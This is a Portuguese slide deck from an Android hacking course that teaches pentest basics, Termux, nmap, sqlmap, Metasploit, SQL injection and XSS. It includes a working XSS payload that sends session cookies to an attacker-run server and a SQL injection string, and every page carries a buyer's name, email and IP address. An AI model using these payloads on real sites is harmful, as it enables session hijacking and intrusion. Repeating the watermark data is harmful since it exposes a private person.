Você está na página 1de 63

Ítalo Diniz da Silva Costa - email.principal416@gmail.com - IP: 177.55.247.

35
AVISO !
Tenha nota que:

1. Este curso foi escrito e apresentado por profissionais de segurança da informação.


2. Toda informação aprendida aqui é com intuito de formar profissionais, e qualquer aplicação fora da
lei é de própria responsabilidade do aplicante da mesma.
3. Todo conteúdo deste curso é de propriedade do Hacking Brasil e Técnicas de Invasão e sua
reprodução não autorizada é vetada.

"Que os nossos esforços desafiem as impossibilidades. Lembrai-vos de que as grandes proezas da história
foram conquistadas do que parecia impossível". - CHARLES CHAPLIN.

Ítalo Diniz da Silva Costa - email.principal416@gmail.com - IP: 177.55.247.35


INTRODUÇÃO PENTEST
01 Introdução ao treinamento e 03 Vamos aprender o que é um
sobre o Instrutor. pentest, e seus principais
tipos

ETHICAL HACKING PREPARANDO O LABORATÓRIO


02 Vamos aprender sobre Ethical 04 Aqui faremos nosso
Hacking e suas aplicações laboratório para enfim
legais. começarmos a parte prática.

Ítalo Diniz da Silva Costa - email.principal416@gmail.com - IP: 177.55.247.35


COMO ATACAR DO
ATACANDO WEBSITES
MEU CELULAR ? 06 Aqui aprendemos as técnicas
05 Aqui aprenderemos os mais utilizadas para Web
fundamentos principais para Hacking do seu celular.
realizarmos ataques do nosso
dispositivo móvel.

EXPLOIT PERFEITO APLICATIVOS ÚTEIS


07 Nesse módulo, aprendemos a 08 Nesse módulo, deixarei como
descobrir e utilizar o exploit dica, alguns aplicativos que
perfeito utilizo no dia-a-dia

Ítalo Diniz da Silva Costa - email.principal416@gmail.com - IP: 177.55.247.35


INTRODUÇÃO 01
Ítalo Diniz da Silva Costa - email.principal416@gmail.com - IP: 177.55.247.35
Olá, me chamo Pedro Nogueira. Sou Ethical
Hacker e fundador do canal Hacking Brasil
SOBRE O
Serei instrutor de vocês durante todo esse
curso de Hackeando com Android
INSTRUTOR

Ítalo Diniz da Silva Costa - email.principal416@gmail.com - IP: 177.55.247.35


SOBRE O CURSO

O curso Hackeando com Android foi desenvolvido para você que deseja
aprender as principais técnicas hacking e fazendo isso tudo diretamente do
seu celular.

Aqui você vai aprender desde os principais comandos que você pode utilizar
no Termux, até escolher o exploit para um ataque direcionado.

Ítalo Diniz da Silva Costa - email.principal416@gmail.com - IP: 177.55.247.35


ETHICAL
HACKING
02
Ítalo Diniz da Silva Costa - email.principal416@gmail.com - IP: 177.55.247.35
O QUE É O ETHICAL HACKING ?

Para entender o que é o Ethical Hacking temos que primeiro entender o que é
um Hacker. Hacker em sua grande maioria é associada aos criminosos, porém,
Hacker, é um indivíduo que tem a habilidade de “quebrar” sistemas em
funcionamento, e um Cyber Criminoso é um Hacker que faz isso pro mal. Ao
contrário disso, O Ethical Hacking, são as práticas de Hacking utilizadas para o
bem, onde o indivíduo é capaz de utilizar as mesmas técnicas que são
utilizadas para denegrir um sistema, faz isso para testá-lo e certificar se está à
prova de invasões. Então, em resumo, o Ethical Hacking, ou Hacker Ético, é
quando um Hacker, do bem, utiliza de meios hackers para testar sistemas mas
de forma ética, sem denegrir o sistema, e somente com a finalidade de testar
a sua segurança.
Ítalo Diniz da Silva Costa - email.principal416@gmail.com - IP: 177.55.247.35
NOMENCLATURAS

PENTEST : Penetration Test, testes de invasão em aplicações.

AMEAÇA : Ameaça é quando um sistema tem a possibilidade de estar


vulnerável.

EXPLOIT : Script escrito por você, ou por alguém, que irá explorar de forma
automática no site alvo.

VULNERABILIDADE : É a comprovação que uma ameaça é realmente válida.

MALWARE : Software com parte maliciosa, que tem intuito de comprometer sua
rede.

Ítalo Diniz da Silva Costa - email.principal416@gmail.com - IP: 177.55.247.35


COMO SE TORNAR UM HACKER ÉTICO ?

O Hacker Ético é um profissional que segue um código de conduta quando


realiza algum pentest, é aquela pessoa que “Hackeia pra o bem” e não com
intuito de denegrir serviços, sim com o objetivo de tentar achar uma falha, e
reportar, antes que todo um sistema seja comprometido por um CYBER
CRIMINOSO.

Para se tornar um HACKER ÉTICO é importante ter em mente, que um HACKER


ÉTICO, deve seguir algumas condutas, como não divulgação dos dados,
sempre seguir o escopo pré-definido no contrato, e sempre fazer com o
máximo de cuidado para não deixar nada fora do ar.

Ítalo Diniz da Silva Costa - email.principal416@gmail.com - IP: 177.55.247.35


TIPOS DE HACKERS

É o hacker do bem, um
É o hacker que não tem
hacker ético, em sua
nenhum tipo de
grande maioria é um É o hacker do bem, white
escrúpulo, que hackeia
WHITE HAT, é aquele que hat, que utiliza algumas
para denegrir um serviço
procura por falhas antes técnicas dos BLACK HAT
e ou, coletar informações
que as CIBERCRIMINOSOS em seu pentest.
e chantagear os donos
possam encontrá-la e
dela.
denegrir algum serviço.,

BLACK HAT WHITE HAT GREY HAT

Ítalo Diniz da Silva Costa - email.principal416@gmail.com - IP: 177.55.247.35


VULNERABILIDADES POR ONDE COMEÇAR

Uma vulnerabilidade é uma falha que conseguimos certificar. Mas agora, como
podemos determinar uma vulnerabilidade ?

Primeiro, podemos começar por sistemas operacionais, sem eles, Windows,


Mac ou Linux. Esse sistemas são sempre testados, e sempre estão lançando
vulnerabilidade comuns (CVE), que podem ser facilmente encontradas em
sistemas desatualizados.

Depois, podemos partir para aplicações, procurando as mesmas CVE’s para as


versões dos sistemas vulneráveis como SQL INJECTION, XSS e ETC.

Ítalo Diniz da Silva Costa - email.principal416@gmail.com - IP: 177.55.247.35


ASPECTOS LEGAIS

Como você deve saber, hoje, é proibido por lei invadir, ou testar um sistema
da informação sem autorização de quem é proprietário daquele sistema da
informação, quem faz isso é considerado um Cyber Criminoso, e está passível
à pena de reclusão.

O que sempre como Ethical Hackers devemos fazer é ter tudo documentado,
através de contratos e acordos de NDA. No contrato deve ser especificado em
que o contratante solicitou a exploração de vulnerabilidades naquele escopo,
e que concorda com todos os teste que serão feito. E o acordo de NDA é o
acordo de não divulgação, logo, nenhuma das partes pode vazar informações
sigilosas do projeto de pentest.

Ítalo Diniz da Silva Costa - email.principal416@gmail.com - IP: 177.55.247.35


PENTEST 03
Ítalo Diniz da Silva Costa - email.principal416@gmail.com - IP: 177.55.247.35
PENTEST

O pentest ou Penetration Test (traduzindo Teste de Penetração), é onde nós


profissionais de segurança da informação utilizamos de técnicas hackers para
tentar penetrar uma defesa, ou um alvo já previamente definido no escopo.
Pentest é um projeto onde atacamos alguns ativos da empresa, com a
intenção de mostrar falhas de implantação, ou vulnerabilidades para que
possam ser corrigidas.

Ítalo Diniz da Silva Costa - email.principal416@gmail.com - IP: 177.55.247.35


TIPOS DE PENTEST
Pentest onde sabemos
todos as informações do
Pentest onde não alvo, se ele conecta em Pentest que é o misto dos
sabemos nenhuma API’s, seus IP’s, servidores dois, nem tanta
informação sobre o alvo, com que conversa, e até informação quanto o
no máximo o seu nome, o login dependendo da White Box, nem pouca
resto vem de pesquisas. plataforma. quanto o Black Box.

BLACK BOX WHITE BOX GREY BOX

Ítalo Diniz da Silva Costa - email.principal416@gmail.com - IP: 177.55.247.35


Analisar e Reconhecer
ativos Reconnaissance
Fase onde escaneamos a
Scanning rede, vulnerabilidades ou
portas abertas.

FASES DE
Depois da análise é
iniciada a tentativa de Gaining Access
invasão pelos analistas.

UM PENTEST Maintaining
Depois de “invadido” o
sistema, o analista deve
trabalhar para manter o
Access seu acesso ao mesmo.

Limpeza de logs, e
resíduos deixados após a
Clearing
exploração. Tracks

Ítalo Diniz da Silva Costa - email.principal416@gmail.com - IP: 177.55.247.35


PREPARANDO O
LABORATÓRIO
04
Ítalo Diniz da Silva Costa - email.principal416@gmail.com - IP: 177.55.247.35
PREPARANDO O LABORATÓRIO

Download do Termux na PlayStore :

https://play.google.com/store/apps/details?id=com.termux&hl=pt_BR&gl=US

Ítalo Diniz da Silva Costa - email.principal416@gmail.com - IP: 177.55.247.35


PREPARANDO O LABORATÓRIO

COMANDOS :

● pkg install net-tools


● pkg install w-get
● pkg install python -y && pkg install python2 -y
● pkg install git
● pip install lolcat
● git clone https://github.com/rajkumardusad/Tool-X.git
● cd Tool-X
● chmod +x install.aex
● sh install.aex
● .\Tool-X
Ítalo Diniz da Silva Costa - email.principal416@gmail.com - IP: 177.55.247.35
PREPARANDO O LABORATÓRIO

PACOTES PARA INSTALAR COM O TOOL-X:

● 268 - NMAP
● 316 - SQLMAP
● 314 - SETOOLKIT

Ítalo Diniz da Silva Costa - email.principal416@gmail.com - IP: 177.55.247.35


PREPARANDO O LABORATÓRIO

INSTALANDO O METASPLOIT :

● git clone https://github.com/noob-hackers/m-wiz.git


● cd m-wiz
● bash m-wiz.sh
● Enter
● Opção 1- Metasploit Install
● Enter
● Opção 1 - Versão 4.4
● Enter

Ítalo Diniz da Silva Costa - email.principal416@gmail.com - IP: 177.55.247.35


FICANDO CRAQUE NO TERMUX

COMANDOS ÚTEIS :

● INFORMAÇÕES DO SISTEMAS
○ uname -a
○ uname -m
○ cat /proc/meminfo
○ date
○ whoami
○ id

Ítalo Diniz da Silva Costa - email.principal416@gmail.com - IP: 177.55.247.35


FICANDO CRAQUE NO TERMUX

COMANDOS ÚTEIS :

● ADMINISTRAÇÃO DE SISTEMAS
○ shutdown
○ shutdown now
○ shutdown -h 15
○ shutdown -c
○ reboot
○ Logout
○ telinit 0

Ítalo Diniz da Silva Costa - email.principal416@gmail.com - IP: 177.55.247.35


FICANDO CRAQUE NO TERMUX

COMANDOS ÚTEIS :

● DISCO
○ df -h
● USUÁRIOS E GRUPOS
○ useradd usuario
○ userdel usuario
○ userdel -r usuario
○ groupadd nomedogrupo
○ groupdel nomedogrupo
○ groupmod -n novonome nomeantigo
Ítalo Diniz da Silva Costa - email.principal416@gmail.com - IP: 177.55.247.35
FICANDO CRAQUE NO TERMUX

COMANDOS ÚTEIS :

● USUÁRIOS E GRUPOS
○ passwd usuario
○ gpasswd -a usuario grupo

ARQUIVOS E DIRETÓRIOS

● ls
● cd
● cd ~

Ítalo Diniz da Silva Costa - email.principal416@gmail.com - IP: 177.55.247.35


FICANDO CRAQUE NO TERMUX

COMANDOS ÚTEIS :

ARQUIVOS E DIRETÓRIOS

● ls
● cd
● cd ~
● cd ..
● cd ../..
● pwd
● ls -l
● ls -a
Ítalo Diniz da Silva Costa - email.principal416@gmail.com - IP: 177.55.247.35
FICANDO CRAQUE NO TERMUX

COMANDOS ÚTEIS :

ARQUIVOS E DIRETÓRIOS

● touch meuarquivo.txt
● cat meuarquivo.txt
● mkdir meudiretorio
● rm
● rm -rf
● mv meuarquivo meuarquivonovo
● mv meuarquivo meunovodiretorio/meuarquivo

Ítalo Diniz da Silva Costa - email.principal416@gmail.com - IP: 177.55.247.35


FICANDO CRAQUE NO TERMUX

COMANDOS ÚTEIS :

ARQUIVOS E DIRETÓRIOS

● cp meuarquivo ondequerocopiar/meuarquivo
● find meuarquivo
● gzip meuarquivoparacompactar
● gzip -d meuarquivo.txt.gz
● tar -czf meudiretorioparacompactar
● tar -xvzf meudiretorio.tar

Ítalo Diniz da Silva Costa - email.principal416@gmail.com - IP: 177.55.247.35


FICANDO CRAQUE NO TERMUX

COMANDOS ÚTEIS :

TEXTO

● nano meuarquivo.txt
● vim meuarquivo.txt
● vi meuarquivo.txt
● echo “adicionaressalinha” >> meuarquivo.txt
● echo “substituirtodooarquivo” > meuarquivo.txt
● head -4 meuarquivo
● tail -4 meuarquivo
● cat meuarquivo | more
Ítalo Diniz da Silva Costa - email.principal416@gmail.com - IP: 177.55.247.35
FICANDO CRAQUE NO TERMUX

COMANDOS ÚTEIS :

TEXTO

● cat meuarquivo | less


● cat meuarquivo | grep o que quero encontrar

REDES

● ifconfig
● ifconfig eth0
● ifdown eth0
● ifup eth0
Ítalo Diniz da Silva Costa - email.principal416@gmail.com - IP: 177.55.247.35
FICANDO CRAQUE NO TERMUX

COMANDOS ÚTEIS :

REDES

● ifconfig eth0 10.0.0.1 netmask 255.255.255


● route -n

PROCESSO E CRONTAB

● ps
● ps -aux

Ítalo Diniz da Silva Costa - email.principal416@gmail.com - IP: 177.55.247.35


FICANDO CRAQUE NO TERMUX

COMANDOS ÚTEIS :

PROCESSO E CRONTAB

● ps
● ps -aux
● ps -aux | grep root
● crontab -e

Ítalo Diniz da Silva Costa - email.principal416@gmail.com - IP: 177.55.247.35


WHAT DO WE DO?

Mercury is the smallest Venus has a beautiful name,


planet in our Solar System but it’s terribly hot

Jupiter is the biggest planet Saturn is composed of


in our Solar System hydrogen and helium

Ítalo Diniz da Silva Costa - email.principal416@gmail.com - IP: 177.55.247.35


ATACANDO
DO MEU 05
CELULAR
Ítalo Diniz da Silva Costa - email.principal416@gmail.com - IP: 177.55.247.35
COLETA DE INFORMAÇÃO

A coleta de informações é um passo muito importante na parte do Ethical


Hacking, aqui é onde vamos entender com o que estamos lidando, e quais são
as primeiras informações daquele alvo, para num futuro explorar tudo o que
coletamos aqui.

Ítalo Diniz da Silva Costa - email.principal416@gmail.com - IP: 177.55.247.35


WHOIS

O Whois é uma ferramenta de DNS muito interessante para coleta de


informações do domínio.
Conseguimos coletar, CPF, Endereço, Servidores de NS, E-mail e ETC.

Então em um pentest de BlackBox, depois de achar o domínio de onde irá


fazer o teste, o Whois pode te trazer mais informações privilegiadas daquele
alvo.

Ítalo Diniz da Silva Costa - email.principal416@gmail.com - IP: 177.55.247.35


DNS

O DNS (Domain Name Server) é o serviço responsável por traduzir nome em


endereço ip, coletando informações dos DNS na internet, conseguimos as
informações de seus alvos em grande escala, como por exemplo um site que
estava fora do escopo e apareceu em nossa consulta DNS.

Ítalo Diniz da Silva Costa - email.principal416@gmail.com - IP: 177.55.247.35


Google Hacking

O Google Hacking, ou Google Dorks são conjunto de parâmetros à serem


utilizados no Google, como por exemplo o inurl: que todas as pesquisas que
irá trazer, serão da url colocada ali.

No site do Exploit DB podemos ver várias formas de utilizar ao nosso favor.

https://www.exploit-db.com/google-hacking-database

Ítalo Diniz da Silva Costa - email.principal416@gmail.com - IP: 177.55.247.35


Shodan

Shodan é um primo distante do Google Hacking, porém, muito mais poderoso,


ele é voltada para pesquisa de ativos que estão indexados na internet, como
por exemplo, câmeras de segurança, acessos remotos abertos, dentro outros.

Ítalo Diniz da Silva Costa - email.principal416@gmail.com - IP: 177.55.247.35


NMAP

Você já sabe que o Network Mapper (NMAP) é um canivete suíço de coleta de


informações, nele nós conseguimos saber desde um dispositivo se está ativo
ou não, temos como consultar portas abertas e até pesquisa de
vulnerabilidade.

Ítalo Diniz da Silva Costa - email.principal416@gmail.com - IP: 177.55.247.35


NMAP

COMANDOS ÚTEIS NO NMAP :

HOSTS NA REDE

nmap -sL 192.168.0.1/24

HOSTS ATIVOS

nmap -sn 192.168.0.1/24

Ítalo Diniz da Silva Costa - email.principal416@gmail.com - IP: 177.55.247.35


NMAP

COMANDOS ÚTEIS NO NMAP :

HOSTS COM PORTA 80 ABERTA

nmap -sT -p 80 10.0.0.*

HOSTS COM VULNERABILIDADES

nmap --script vuln 192.168.0.1/24

Ítalo Diniz da Silva Costa - email.principal416@gmail.com - IP: 177.55.247.35


NMAP

COMANDOS ÚTEIS NO NMAP :

VERSÃO DAS APLICAÇÕES

nmap -sV -p 80 10.0.0.0/24

HOSTS EM TXT

nmap -iL /tmp/listahackeandocomandroid.txt

Ítalo Diniz da Silva Costa - email.principal416@gmail.com - IP: 177.55.247.35


NMAP

COMANDOS ÚTEIS NO NMAP :

MODO FAST

nmap -F 192.168.0.1

DESCOBRIR S.O (REQUER ROOT)

nmap -O 192.168.0.1

Ítalo Diniz da Silva Costa - email.principal416@gmail.com - IP: 177.55.247.35


DIRB

O Dirb é uma ferramenta de coleta de informações bastante útil quando


estamos realizando pentest web, pois ele de forma automática realiza a
varredura de diretórios, então é capaz de encontrar páginas
administrativas, páginas com informações demais que conseguem nos
ajudar nos pentest web.

Vale lembrar do parâremtros :

-X .php : vai ter ajudar em um site com extensões .php

-R vai te questionar se quer realizar uma busca recursiva naquele


diretório.
Ítalo Diniz da Silva Costa - email.principal416@gmail.com - IP: 177.55.247.35
INFOSPLOIT

O Infosploit é uma ferramenta que irá te ajudar na automatização dos


processos de coleta de informações, fazendo com que seja uma etapa
mais rápida e ágil.

INSTAÇÃO DO INFOSPLOIT :

git clone https://github.com/CybernetiX-S3C/InfoSploit

UTILIZAÇÃO :

cd InfoSploit

Python2 InfoSploit.py
Ítalo Diniz da Silva Costa - email.principal416@gmail.com - IP: 177.55.247.35
ATACANDO
WEBSITES
06
Ítalo Diniz da Silva Costa - email.principal416@gmail.com - IP: 177.55.247.35
SQL INJECTION
Sql injection é a forma com que, os atacantes utilizam as entradas de consulta
em bancos, para ‘modificarem’ e injetar códigos maliciosos na aplicação.

Ítalo Diniz da Silva Costa - email.principal416@gmail.com - IP: 177.55.247.35


SQL INJECTION
Em um sistema, para uma consulta melhor, permitimos os usuário insiram
dados para que o filtro, ou inserção de dados no banco seja de acordo com o
que o usuário deseja.
Para fazer isso, usamos o SQL (Structured Query Language) e muitas vezes
esse código está vulnerável à injeção de código.

Partindo do princípio que temos um banco e uma tabela com os usuários,


neste, eu faço uma consulta através do id do usuário.
No meu website, eu tenho um input onde eu insiro este ID e me retorna estes
dados.

Ítalo Diniz da Silva Costa - email.principal416@gmail.com - IP: 177.55.247.35


SQL INJECTION

Aqui, podemos deduzir um código em SQL, como por exemplo :


SELECT * FROM usuarios WHERE id = ‘valor do input’

E se, no input eu falasse que, o usuário seria o de ID 1, ou quando 1=1 ( o que


é sempre verdadeiro :P), o código ficaria mais ou menos assim :
SELECT * FROM usuarios WHERE id = ‘1' OR 1='1’
Assim, todo o meu código é verdadeiro, então, vai trazer qualquer coisa que
estiver no banco.

Ítalo Diniz da Silva Costa - email.principal416@gmail.com - IP: 177.55.247.35


SQLMAP
Utilização do SQL MAP

$ python sqlmap.py

PARÂMETROS

-u = URL DO SITE
--dbs = MOSTRAR OS BANCOS
--tables = MOSTRAR AS TABELAS
--columns = MOSTRAR AS COLUNAS
-D = SELECIONAR O BANCO
-T = SELECIONAR TABELAS
-C = SELECIONAR COLUNAS
Ítalo Diniz da Silva Costa - email.principal416@gmail.com - IP: 177.55.247.35
XSS
XSS ou Cross-Site-Scripting como é bem conhecido, é uma maneira de
‘inputarmos’ algo malicioso que será interpretado no navegador, seja ele um
redirecionamento, roubo de sessão, ou até mesmo um simples alert.

XSS Reflected :
É o XSS momentâneo, o que depois de f5 some, que não é gravado em
nenhum lugar.

XSS Stored:
É o XSS permanente, que sempre ficará ativo, pois o comando foi guardado no
banco, encontrado muito em páginas de comentários.

Ítalo Diniz da Silva Costa - email.principal416@gmail.com - IP: 177.55.247.35


XSS
Comandos utilizados na aula :

Python WebServer
$ python -m http.server

XSS Alert
<script>alert(‘XSS HACKEANDO COM ANDROID’);</script>

XSS Enviando o Cookie da Sessão


<script>fetch('http://192.168.0.145:8000/?='+document.cookie)</script>

Ítalo Diniz da Silva Costa - email.principal416@gmail.com - IP: 177.55.247.35


XSS
Comandos utilizados na aula :

Pegando o Cookie da Sessão


<script>alert(document.cookie);</script>

Rodando FlappyBird
<script>document.body.innerHTML = '<iframe
src="https://ellisonleao.github.io/clumsy-bird/" style="position:fixed; top:0;
left:0; bottom:0; right:0; width:100%; height:100%; border:none; margin:0;
padding:0; overflow:hidden; z-index:999999;"></iframe>';</script>

Ítalo Diniz da Silva Costa - email.principal416@gmail.com - IP: 177.55.247.35


EXPLOIT
PERFEITO
07
Ítalo Diniz da Silva Costa - email.principal416@gmail.com - IP: 177.55.247.35
EXPLOIT PERFEITO
O exploit perfeito, é aquele que é descoberto com muito suor.
Depois de feita toda a análise, depois do scanning, e com todas as
informações na mão, agora é só pesquisar na internet qual é a
vulnerabilidade e descobrir como aplicá-la.

Ítalo Diniz da Silva Costa - email.principal416@gmail.com - IP: 177.55.247.35


MSFCONSOLE
Para executar o MSFCONSOLE

$ cd metasploit-framework
$ ./msfconsole

Parâmetros :
Show options = MOSTRA OPÇÕES
Set = DEFINE ALGUM PARÂMETRO
Rhost = REMOTE HOST (MÁQUINA ALVO)
Lhost = LOCAL HOST (MÁQUINA LOCAL)
Rport = REMOTE PORT (PORTA DA MÁQUINA ALVO)
Lport = LOCAL PORT (PORTA DA MÁQUINA LOCAL)
Exploit ou run = EXECUTA O EXPLOIT
Ítalo Diniz da Silva Costa - email.principal416@gmail.com - IP: 177.55.247.35
MSFCONSOLE
Parâmetros :

Search = PROCURA O EXPLOIT


Use = SELECIONA O EXPLOIT

Ítalo Diniz da Silva Costa - email.principal416@gmail.com - IP: 177.55.247.35


APLICATIVOS
ÚTEIS
08
Ítalo Diniz da Silva Costa - email.principal416@gmail.com - IP: 177.55.247.35
APLICATIVOS ÚTEIS
Aplicativos utilizados na aula:

Zanti
https://www.zimperium.com/zanti-mobile-penetration-testing
Facesniff
https://faceniff.ponury.net/
Wikill
https://wifikillapk.com/download/
Fing
https://play.google.com/store/apps/details?id=com.overlook.android.fing&hl=en
Connect Bot
https://play.google.com/store/apps/details?id=org.connectbot&hl=pt_BR&gl=US

Ítalo Diniz da Silva Costa - email.principal416@gmail.com - IP: 177.55.247.35


THANKS!
Dúvidas ?

contato@hackingbrasil.com

CREDITS: This presentation template was created by Slidesgo, including


icons by Flaticon, and infographics & images by Freepik.

Please keep this slide for attribution.

Ítalo Diniz da Silva Costa - email.principal416@gmail.com - IP: 177.55.247.35

Você também pode gostar